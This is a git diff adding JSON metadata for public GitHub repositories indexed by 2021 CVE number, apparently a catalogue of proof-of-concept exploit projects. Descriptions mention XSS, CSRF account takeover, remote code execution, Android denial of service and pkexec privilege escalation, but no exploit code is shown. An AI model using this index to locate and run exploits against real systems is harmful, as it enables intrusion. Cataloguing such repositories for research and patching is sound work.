+ "description": "XSS vulnerability in Online Student Rate System1.0",
+ "fork": false,
+ "created_at": "2021-08-17T16:45:06Z",
+ "updated_at": "2022-06-23T15:06:29Z",
+ "pushed_at": "2022-06-23T15:04:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39409.json b/2021/CVE-2021-39409.json
new file mode 100644
index 0000000000..da7dfcef33
--- /dev/null
+++ b/2021/CVE-2021-39409.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 397328392,
+ "name": "CVE-2021-39409",
+ "full_name": "StefanDorresteijn\/CVE-2021-39409",
+ "owner": {
+ "login": "StefanDorresteijn",
+ "id": 2564735,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2564735?v=4",
+ "html_url": "https:\/\/github.com\/StefanDorresteijn"
+ },
+ "html_url": "https:\/\/github.com\/StefanDorresteijn\/CVE-2021-39409",
+ "description": "Admin account registration in Online Student Rate System",
+ "fork": false,
+ "created_at": "2021-08-17T16:48:53Z",
+ "updated_at": "2022-06-23T15:08:09Z",
+ "pushed_at": "2022-06-23T15:04:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39433.json b/2021/CVE-2021-39433.json
new file mode 100644
index 0000000000..160feef7d0
--- /dev/null
+++ b/2021/CVE-2021-39433.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 413549812,
+ "name": "CVE-2021-39433",
+ "full_name": "PinkDraconian\/CVE-2021-39433",
+ "owner": {
+ "login": "PinkDraconian",
+ "id": 44903767,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44903767?v=4",
+ "html_url": "https:\/\/github.com\/PinkDraconian"
+ },
+ "html_url": "https:\/\/github.com\/PinkDraconian\/CVE-2021-39433",
+ "description": "BIQS IT Biqs-drive v1.83",
+ "fork": false,
+ "created_at": "2021-10-04T19:02:35Z",
+ "updated_at": "2022-12-10T12:13:04Z",
+ "pushed_at": "2021-10-04T19:02:53Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39473.json b/2021/CVE-2021-39473.json
new file mode 100644
index 0000000000..51ba2c5572
--- /dev/null
+++ b/2021/CVE-2021-39473.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 686165722,
+ "name": "CVE-2021-39473",
+ "full_name": "BrunoTeixeira1996\/CVE-2021-39473",
+ "owner": {
+ "login": "BrunoTeixeira1996",
+ "id": 12052283,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12052283?v=4",
+ "html_url": "https:\/\/github.com\/BrunoTeixeira1996"
+ },
+ "html_url": "https:\/\/github.com\/BrunoTeixeira1996\/CVE-2021-39473",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-01T23:16:05Z",
+ "updated_at": "2023-09-01T23:16:06Z",
+ "pushed_at": "2023-09-01T23:17:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39475.json b/2021/CVE-2021-39475.json
new file mode 100644
index 0000000000..9266cdfb95
--- /dev/null
+++ b/2021/CVE-2021-39475.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 398032665,
+ "name": "CVE-2021-39475",
+ "full_name": "W4RCL0UD\/CVE-2021-39475",
+ "owner": {
+ "login": "W4RCL0UD",
+ "id": 85202889,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85202889?v=4",
+ "html_url": "https:\/\/github.com\/W4RCL0UD"
+ },
+ "html_url": "https:\/\/github.com\/W4RCL0UD\/CVE-2021-39475",
+ "description": "Found multiple XSS vulnerabilities within PhoenixCart 1.0.8.0",
+ "fork": false,
+ "created_at": "2021-08-19T18:03:40Z",
+ "updated_at": "2023-10-05T15:39:05Z",
+ "pushed_at": "2023-10-05T15:39:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39476.json b/2021/CVE-2021-39476.json
new file mode 100644
index 0000000000..f899703456
--- /dev/null
+++ b/2021/CVE-2021-39476.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 399906116,
+ "name": "CVE-2021-39476",
+ "full_name": "W4RCL0UD\/CVE-2021-39476",
+ "owner": {
+ "login": "W4RCL0UD",
+ "id": 85202889,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85202889?v=4",
+ "html_url": "https:\/\/github.com\/W4RCL0UD"
+ },
+ "html_url": "https:\/\/github.com\/W4RCL0UD\/CVE-2021-39476",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-25T17:37:54Z",
+ "updated_at": "2021-08-25T17:39:15Z",
+ "pushed_at": "2021-08-25T17:39:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39512.json b/2021/CVE-2021-39512.json
new file mode 100644
index 0000000000..b0b6857a4a
--- /dev/null
+++ b/2021/CVE-2021-39512.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 398434624,
+ "name": "CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver",
+ "full_name": "guusec\/CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver",
+ "owner": {
+ "login": "guusec",
+ "id": 78179391,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78179391?v=4",
+ "html_url": "https:\/\/github.com\/guusec"
+ },
+ "html_url": "https:\/\/github.com\/guusec\/CVE-2021-39512-BigTreeCMS-v4.4.14-AccountTakeOver",
+ "description": "Unauthenticated CSRF Account TakeOver in BigTreeCMS v4.4.14",
+ "fork": false,
+ "created_at": "2021-08-21T00:58:38Z",
+ "updated_at": "2021-08-25T04:26:10Z",
+ "pushed_at": "2021-08-21T02:53:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39623.json b/2021/CVE-2021-39623.json
new file mode 100644
index 0000000000..23bd0bc51e
--- /dev/null
+++ b/2021/CVE-2021-39623.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 446572887,
+ "name": "CVE-2021-39623",
+ "full_name": "bb33bb\/CVE-2021-39623",
+ "owner": {
+ "login": "bb33bb",
+ "id": 5463104,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4",
+ "html_url": "https:\/\/github.com\/bb33bb"
+ },
+ "html_url": "https:\/\/github.com\/bb33bb\/CVE-2021-39623",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-10T20:32:28Z",
+ "updated_at": "2022-01-12T01:06:39Z",
+ "pushed_at": "2022-01-11T11:22:54Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39670.json b/2021/CVE-2021-39670.json
new file mode 100644
index 0000000000..923c01cab8
--- /dev/null
+++ b/2021/CVE-2021-39670.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 605438103,
+ "name": "Wallbreak",
+ "full_name": "Supersonic\/Wallbreak",
+ "owner": {
+ "login": "Supersonic",
+ "id": 36431699,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36431699?v=4",
+ "html_url": "https:\/\/github.com\/Supersonic"
+ },
+ "html_url": "https:\/\/github.com\/Supersonic\/Wallbreak",
+ "description": "Exploit app for CVE-2021-39670 and CVE-2021-39690, two permanent denial-of-service vulnerabilities in Android's wallpaper system",
+ "fork": false,
+ "created_at": "2023-02-23T06:36:47Z",
+ "updated_at": "2023-05-22T10:56:43Z",
+ "pushed_at": "2023-03-03T17:39:43Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "android",
+ "cve",
+ "exploit",
+ "security",
+ "vrp"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39685.json b/2021/CVE-2021-39685.json
new file mode 100644
index 0000000000..4d2349947b
--- /dev/null
+++ b/2021/CVE-2021-39685.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 438658753,
+ "name": "inspector-gadget",
+ "full_name": "szymonh\/inspector-gadget",
+ "owner": {
+ "login": "szymonh",
+ "id": 12231135,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12231135?v=4",
+ "html_url": "https:\/\/github.com\/szymonh"
+ },
+ "html_url": "https:\/\/github.com\/szymonh\/inspector-gadget",
+ "description": "CVE-2021-39685 Description and sample exploit for Linux USB Gadget overflow vulnerability",
+ "fork": false,
+ "created_at": "2021-12-15T14:28:00Z",
+ "updated_at": "2023-07-18T01:51:28Z",
+ "pushed_at": "2022-04-28T10:15:24Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39692.json b/2021/CVE-2021-39692.json
new file mode 100644
index 0000000000..2d7765cd73
--- /dev/null
+++ b/2021/CVE-2021-39692.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 485788776,
+ "name": "packages_apps_ManagedProvisioning_CVE-2021-39692",
+ "full_name": "nanopathi\/packages_apps_ManagedProvisioning_CVE-2021-39692",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/packages_apps_ManagedProvisioning_CVE-2021-39692",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-26T13:03:35Z",
+ "updated_at": "2022-04-26T13:06:56Z",
+ "pushed_at": "2023-04-17T12:24:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39696.json b/2021/CVE-2021-39696.json
new file mode 100644
index 0000000000..687d386c33
--- /dev/null
+++ b/2021/CVE-2021-39696.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 585432482,
+ "name": "frameworks_base_AOSP_10_r33_CVE-2021-39696",
+ "full_name": "nidhihcl\/frameworks_base_AOSP_10_r33_CVE-2021-39696",
+ "owner": {
+ "login": "nidhihcl",
+ "id": 121002296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121002296?v=4",
+ "html_url": "https:\/\/github.com\/nidhihcl"
+ },
+ "html_url": "https:\/\/github.com\/nidhihcl\/frameworks_base_AOSP_10_r33_CVE-2021-39696",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-05T06:42:33Z",
+ "updated_at": "2023-03-27T01:17:17Z",
+ "pushed_at": "2023-01-05T06:51:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39704.json b/2021/CVE-2021-39704.json
new file mode 100644
index 0000000000..f0bfb0273b
--- /dev/null
+++ b/2021/CVE-2021-39704.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 485748968,
+ "name": "framework_base_AOSP10_r33_CVE-2021-39704",
+ "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-39704",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-39704",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-26T11:04:14Z",
+ "updated_at": "2022-04-26T11:21:43Z",
+ "pushed_at": "2022-04-26T11:23:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39706.json b/2021/CVE-2021-39706.json
new file mode 100644
index 0000000000..c4fe451d9f
--- /dev/null
+++ b/2021/CVE-2021-39706.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 486566485,
+ "name": "packages_apps_Settings_AOSP10_r33_CVE-2021-39706",
+ "full_name": "Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2021-39706",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2021-39706",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-28T11:30:43Z",
+ "updated_at": "2023-03-27T01:13:07Z",
+ "pushed_at": "2022-04-28T12:12:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3972.json b/2021/CVE-2021-3972.json
new file mode 100644
index 0000000000..d43fff321e
--- /dev/null
+++ b/2021/CVE-2021-3972.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484005758,
+ "name": "CVE-2021-3972",
+ "full_name": "killvxk\/CVE-2021-3972",
+ "owner": {
+ "login": "killvxk",
+ "id": 309424,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/309424?v=4",
+ "html_url": "https:\/\/github.com\/killvxk"
+ },
+ "html_url": "https:\/\/github.com\/killvxk\/CVE-2021-3972",
+ "description": "just poc",
+ "fork": false,
+ "created_at": "2022-04-21T10:25:32Z",
+ "updated_at": "2022-05-13T08:58:40Z",
+ "pushed_at": "2022-04-21T11:02:15Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39749.json b/2021/CVE-2021-39749.json
new file mode 100644
index 0000000000..1fb5a56114
--- /dev/null
+++ b/2021/CVE-2021-39749.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 482306637,
+ "name": "OrganizerTransaction",
+ "full_name": "michalbednarski\/OrganizerTransaction",
+ "owner": {
+ "login": "michalbednarski",
+ "id": 1826899,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1826899?v=4",
+ "html_url": "https:\/\/github.com\/michalbednarski"
+ },
+ "html_url": "https:\/\/github.com\/michalbednarski\/OrganizerTransaction",
+ "description": "PoC for CVE-2021-39749, allowing starting arbitrary Activity on Android 12L Beta",
+ "fork": false,
+ "created_at": "2022-04-16T16:36:48Z",
+ "updated_at": "2024-02-15T17:45:56Z",
+ "pushed_at": "2022-04-16T16:37:23Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39863.json b/2021/CVE-2021-39863.json
new file mode 100644
index 0000000000..2696f45d43
--- /dev/null
+++ b/2021/CVE-2021-39863.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 437552816,
+ "name": "CVE-2021-39863",
+ "full_name": "lsw29475\/CVE-2021-39863",
+ "owner": {
+ "login": "lsw29475",
+ "id": 13043359,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13043359?v=4",
+ "html_url": "https:\/\/github.com\/lsw29475"
+ },
+ "html_url": "https:\/\/github.com\/lsw29475\/CVE-2021-39863",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-12T13:27:16Z",
+ "updated_at": "2023-12-25T22:12:25Z",
+ "pushed_at": "2022-01-06T09:37:18Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40101.json b/2021/CVE-2021-40101.json
new file mode 100644
index 0000000000..5bec007f84
--- /dev/null
+++ b/2021/CVE-2021-40101.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 418598904,
+ "name": "CVE-2021-40101",
+ "full_name": "S1lkys\/CVE-2021-40101",
+ "owner": {
+ "login": "S1lkys",
+ "id": 40408435,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40408435?v=4",
+ "html_url": "https:\/\/github.com\/S1lkys"
+ },
+ "html_url": "https:\/\/github.com\/S1lkys\/CVE-2021-40101",
+ "description": "Survey XSS combined with CSRF leads to Admin Account Takeover in Concrete5 8.5.4",
+ "fork": false,
+ "created_at": "2021-10-18T17:18:28Z",
+ "updated_at": "2024-06-21T00:09:35Z",
+ "pushed_at": "2021-10-18T17:50:19Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "concrete5",
+ "cve-2021-40101",
+ "exploit",
+ "xss"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40113.json b/2021/CVE-2021-40113.json
new file mode 100644
index 0000000000..539c6ba1cb
--- /dev/null
+++ b/2021/CVE-2021-40113.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 595069959,
+ "name": "CVE-2021-40113",
+ "full_name": "karamMahmad\/CVE-2021-40113",
+ "owner": {
+ "login": "karamMahmad",
+ "id": 123936314,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123936314?v=4",
+ "html_url": "https:\/\/github.com\/karamMahmad"
+ },
+ "html_url": "https:\/\/github.com\/karamMahmad\/CVE-2021-40113",
+ "description": "Multiple vulnerabilities in the web-based management interface of the Cisco Catalyst Passive Optical Network (PON) Series Switches Optical Network Terminal (ONT) could allow an unauthenticated, remote attacker to perform the following actions: Log in with a default credential if the Telnet protocol is enabled Perform c CVE project by @Sn0wAlice",
+ "fork": false,
+ "created_at": "2023-01-30T10:30:36Z",
+ "updated_at": "2023-02-20T13:44:13Z",
+ "pushed_at": "2022-12-28T23:25:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40154.json b/2021/CVE-2021-40154.json
new file mode 100644
index 0000000000..ac01baea4e
--- /dev/null
+++ b/2021/CVE-2021-40154.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 431310135,
+ "name": "CVE-2021-40154",
+ "full_name": "Jeromeyoung\/CVE-2021-40154",
+ "owner": {
+ "login": "Jeromeyoung",
+ "id": 39945364,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4",
+ "html_url": "https:\/\/github.com\/Jeromeyoung"
+ },
+ "html_url": "https:\/\/github.com\/Jeromeyoung\/CVE-2021-40154",
+ "description": "POC to test the BootROM vulnerability found in LPC55S69 and K82 Series ",
+ "fork": false,
+ "created_at": "2021-11-24T01:34:47Z",
+ "updated_at": "2023-03-15T10:01:19Z",
+ "pushed_at": "2023-02-18T19:00:03Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40222.json b/2021/CVE-2021-40222.json
new file mode 100644
index 0000000000..66396b5d61
--- /dev/null
+++ b/2021/CVE-2021-40222.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 392752058,
+ "name": "CVE-2021-40222",
+ "full_name": "asang17\/CVE-2021-40222",
+ "owner": {
+ "login": "asang17",
+ "id": 88450083,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88450083?v=4",
+ "html_url": "https:\/\/github.com\/asang17"
+ },
+ "html_url": "https:\/\/github.com\/asang17\/CVE-2021-40222",
+ "description": "Remote Code Execution at Rittal",
+ "fork": false,
+ "created_at": "2021-08-04T16:10:05Z",
+ "updated_at": "2021-09-13T12:16:01Z",
+ "pushed_at": "2021-09-13T12:15:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40223.json b/2021/CVE-2021-40223.json
new file mode 100644
index 0000000000..bea6f90763
--- /dev/null
+++ b/2021/CVE-2021-40223.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 392751851,
+ "name": "CVE-2021-40223",
+ "full_name": "asang17\/CVE-2021-40223",
+ "owner": {
+ "login": "asang17",
+ "id": 88450083,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88450083?v=4",
+ "html_url": "https:\/\/github.com\/asang17"
+ },
+ "html_url": "https:\/\/github.com\/asang17\/CVE-2021-40223",
+ "description": "XSS Vulnerability in Rittal",
+ "fork": false,
+ "created_at": "2021-08-04T16:09:24Z",
+ "updated_at": "2021-09-13T12:15:32Z",
+ "pushed_at": "2021-09-13T12:15:30Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-403.json b/2021/CVE-2021-403.json
new file mode 100644
index 0000000000..a6ce057570
--- /dev/null
+++ b/2021/CVE-2021-403.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 488150478,
+ "name": "CVE-2021-403",
+ "full_name": "rhysmcneill\/CVE-2021-403",
+ "owner": {
+ "login": "rhysmcneill",
+ "id": 33672728,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33672728?v=4",
+ "html_url": "https:\/\/github.com\/rhysmcneill"
+ },
+ "html_url": "https:\/\/github.com\/rhysmcneill\/CVE-2021-403",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-03T09:36:40Z",
+ "updated_at": "2022-11-17T06:24:21Z",
+ "pushed_at": "2022-05-03T09:50:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40303.json b/2021/CVE-2021-40303.json
new file mode 100644
index 0000000000..9d89cd346c
--- /dev/null
+++ b/2021/CVE-2021-40303.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 570289426,
+ "name": "CVE-2021-40303",
+ "full_name": "zecopro\/CVE-2021-40303",
+ "owner": {
+ "login": "zecopro",
+ "id": 23106986,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23106986?v=4",
+ "html_url": "https:\/\/github.com\/zecopro"
+ },
+ "html_url": "https:\/\/github.com\/zecopro\/CVE-2021-40303",
+ "description": "perfex crm 1.10 is vulnerable to Stored Cross Site Scripting (XSS) via \/clients\/profile.",
+ "fork": false,
+ "created_at": "2022-11-24T20:00:16Z",
+ "updated_at": "2024-01-19T19:38:46Z",
+ "pushed_at": "2022-11-24T20:02:25Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-4034.json b/2021/CVE-2021-4034.json
new file mode 100644
index 0000000000..9f241db418
--- /dev/null
+++ b/2021/CVE-2021-4034.json
@@ -0,0 +1,4934 @@
+[
+ {
+ "id": 452072547,
+ "name": "CVE-2021-4034",
+ "full_name": "ryaagard\/CVE-2021-4034",
+ "owner": {
+ "login": "ryaagard",
+ "id": 46634151,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46634151?v=4",
+ "html_url": "https:\/\/github.com\/ryaagard"
+ },
+ "html_url": "https:\/\/github.com\/ryaagard\/CVE-2021-4034",
+ "description": "Local Privilege Escalation in polkit's pkexec",
+ "fork": false,
+ "created_at": "2022-01-25T23:11:30Z",
+ "updated_at": "2024-05-10T10:44:05Z",
+ "pushed_at": "2022-01-26T01:01:15Z",
+ "stargazers_count": 73,
+ "watchers_count": 73,
+ "has_discussions": false,
+ "forks_count": 36,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-4034",
+ "exploit"
+ ],
+ "visibility": "public",
+ "forks": 36,
+ "watchers": 73,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452078002,
+ "name": "cve-2021-4034-playground",
+ "full_name": "bbjubjub2494\/cve-2021-4034-playground",
+ "owner": {
+ "login": "bbjubjub2494",
+ "id": 15657735,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15657735?v=4",
